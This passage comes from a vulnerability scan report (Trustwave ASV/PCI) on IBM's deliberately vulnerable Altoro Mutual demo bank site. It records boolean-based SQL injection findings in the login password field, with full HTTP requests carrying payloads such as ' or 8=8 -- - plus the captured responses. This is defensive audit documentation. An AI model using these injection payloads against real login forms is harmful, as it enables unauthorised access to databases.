return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 213 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 214 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 215 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

15 SQL Injection Vulnerability 7.5 High Fail URL: https://65.61.137.117/doLogin


Port: tcp/443

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 216 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://65.61.137.117/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://65.61.137.117/doLogin HTTP/1.1
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:05:38 GMT
Connection: close

<!doctype html><html lang="en"><head><title>HTTP Status 500 ?


Internal Server Error</title><style type="text/css">H1 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-
serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 217 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;}
BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-
color:white;} B {font-family:Tahoma,Arial,sans-
serif;color:white;background-color:#525D76;} P {font-
family:Tahoma,Arial,sans-serif;background:white;color:black;font-
size:12px;}A {color : black;}A.name {color : black;}HR {color :
#525D76;}</style></head><body><h1>HTTP Status 500 ? Internal
Server Error</h1><hr class="line" /><p><b>Type</b> Status
Report</p><p><b>Description</b> The server encountered an
unexpected condition that prevented it from fulfilling the
request.</p><hr class="line" /><h3>Apache
Tomcat/7.0.92</h3></body></html>
False Request: POST https://65.61.137.117/doLogin HTTP/1.1
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:05:38 GMT

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 218 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 219 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 220 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6" href="index.jsp?
content=personal_other.htm">Other Services</a></li>
</ul>

<a id="CatLink2" class="subheader" href="index.jsp?


content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7" href="index.jsp?
content=business_deposit.htm">Deposit Products</a></li>
<li><a id="MenuHyperLink8" href="index.jsp?
content=business_lending.htm">Lending Services</a></li>
<li><a id="MenuHyperLink9" href="index.jsp?
content=business_cards.htm">Cards</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 221 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink10" href="index.jsp?
content=business_insurance.htm">Insurance</a></li>
<li><a id="MenuHyperLink11" href="index.jsp?
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 222 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 223 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 224 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 225 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10"
>http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10</a>.<br
/><br />

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 226 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

16 SQL Injection Vulnerability 7.5 High Fail URL: http://65.61.137.117/doLogin


Port: tcp/80

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 227 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://65.61.137.117/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://65.61.137.117/doLogin HTTP/1.1
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:29:00 GMT
Connection: close

<!doctype html><html lang="en"><head><title>HTTP Status 500 ?


Internal Server Error</title><style type="text/css">H1 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-
serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-
serif;color:black;background-color:white;} B {font-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 228 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
background-color:#525D76;} P {font-family:Tahoma,Arial,sans-
serif;background:white;color:black;font-size:12px;}A {color :
black;}A.name {color : black;}HR {color :
#525D76;}</style></head><body><h1>HTTP Status 500 ? Internal
Server Error</h1><hr class="line" /><p><b>Type</b> Status
Report</p><p><b>Description</b> The server encountered an
unexpected condition that prevented it from fulfilling the
request.</p><hr class="line" /><h3>Apache
Tomcat/7.0.92</h3></body></html>
False Request: POST http://65.61.137.117/doLogin HTTP/1.1
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:29:01 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 229 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 230 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 231 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader"


href="index.jsp?content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1"
href="index.jsp?content=personal_deposit.htm">Deposit
Product</a></li>
<li><a id="MenuHyperLink2"
href="index.jsp?content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3"
href="index.jsp?content=personal_loans.htm">Loan
Products</a></li>
<li><a id="MenuHyperLink4"
href="index.jsp?content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5"
href="index.jsp?content=personal_investments.htm">Investments
&amp; Insurance</a></li>
<li><a id="MenuHyperLink6"
href="index.jsp?content=personal_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>
<li><a id="MenuHyperLink9"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 232 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 233 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
